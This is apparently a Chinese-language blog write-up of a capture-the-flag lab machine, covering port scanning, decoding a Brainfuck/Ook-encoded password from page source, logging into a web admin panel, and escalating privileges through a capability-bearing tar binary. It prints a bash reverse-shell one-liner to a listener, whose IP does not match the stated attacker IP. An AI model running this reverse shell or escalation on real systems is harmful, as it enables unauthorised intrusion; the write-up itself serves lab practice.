环境准备
下载靶机,开机可以看到,他已经给出了靶机的IP地址。
攻击机IP地址为:192.168.2.15
靶机IP地址为:192.168.2.18
信息收集
使用nmap扫描靶机开放的端口信息
发现靶机开放了三个网页端口和SMB服务
我们去网站访问一下
80端口是正常的网页
但当我去查看源码的时候,发现了ook加密的过后的字符串
输入cyber,和解密的密码,进入20000端口的网站,而且下方还有一个终端可以打开
看一下目录,得到第一个flag
提权
发现目录下还有另外一个文件tar,查看他的权限发现,是可以运行的
突然给这么一个可运行文件肯定是有深意的,我们看一下这个文件拥有的权限是什么
发现它是可以读取任意文件的
我们用tar把它打包之后再解压出来,就没有权限问题了
所以我们反弹一个shell到kali上,kali开始监听9999端口
bash -i >& /dev/tcp/192.168.197.131/9999 0>&1
总结
本靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权
使用 enum4linux 枚举信息
Brainfuck解密
webadmin 后台反弹 shell 提权
提权
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
